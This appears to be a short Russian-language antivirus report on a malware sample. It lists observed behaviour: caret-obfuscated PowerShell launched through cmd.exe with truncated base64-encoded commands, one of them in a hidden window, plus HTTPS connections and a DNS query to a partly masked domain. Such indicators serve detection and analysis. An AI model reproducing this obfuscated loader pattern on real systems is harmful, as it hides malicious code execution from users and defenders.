Техническая информация
- '<SYSTEM32>\cmd.exe' /C Po^W^ERS^hE^lL -E WwBTAHkAUwBUAEUAbQAuAFQARQBYAHQALgBFAE4AYwBPAGQAaQBOAGcAXQA6ADoAdQBOAGkAQwBPAGQARQAuAGcAZQB0AFMAdABSAEkAbgBHACgAWwBzAFkAcwBUAEUATQAuAEMAbwBOAFYAZQBSAFQAXQA6ADoAZgBSAG8AbQBi...
- 'dr###oups.com':443
- 'dr###oups.com':443
- DNS ASK dr###oups.com
- '<SYSTEM32>\cmd.exe' /C Po^W^ERS^hE^lL -E WwBTAHkAUwBUAEUAbQAuAFQARQBYAHQALgBFAE4AYwBPAGQAaQBOAGcAXQA6ADoAdQBOAGkAQwBPAGQARQAuAGcAZQB0AFMAdABSAEkAbgBHACgAWwBzAFkAcwBUAEUATQAuAEMAbwBOAFYAZQBSAFQAXQA6ADoAZgBSAG8AbQBi...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -E WwBTAHkAUwBUAEUAbQAuAFQARQBYAHQALgBFAE4AYwBPAGQAaQBOAGcAXQA6ADoAdQBOAGkAQwBPAGQARQAuAGcAZQB0AFMAdABSAEkAbgBHACgAWwBzAFkAcwBUAEUATQAuAEMAbwBOAFYAZQBSAFQAXQA6ADoAZgBSAG8AbQBiAGEAcwBlADYANABTAF...